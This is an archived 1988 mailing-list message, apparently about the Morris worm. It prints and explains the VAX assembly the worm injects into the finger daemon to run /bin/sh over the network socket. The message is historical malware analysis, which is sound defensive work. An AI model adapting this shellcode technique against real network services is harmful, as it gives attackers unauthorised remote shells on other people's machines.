X-Message-Index: 022 X-Message-Prev: 021 X-Message-Next: 387 X-Thread-Prev: 021 X-Thread-Next: 024 From: Bill Sommerfeld To: phage X-To: phage Subject: virus guts. Date: Fri, 4 Nov 88 00:50:23 EST X-Date: Fri 00:50:23 04/11/1988 EST The code which is inserted into finger is rather simple: mcount+70: pushl $68732f '/sh' mcount+76: pushl $6e69622f '/bin' mcount+7c: movl sp,r10 mcount+7f: pushl $0 mcount+81: pushl $0 mcount+83: pushl r10 mcount+85: pushl $3 mcount+87: movl sp,ap mcount+8a: chmk $3b (execve) For those of you who can't read vax assembler, this does up an "execve", with no arguments, of /bin/sh; since this is run in the context of the finger daemon, stdin and stdout are connected to the network socket... From disassembling the code, it looks like the programmer is really anally retentive about checking return codes, and, in addition, prefers to use array indexing instead of pointers to walk through arrays. - Bill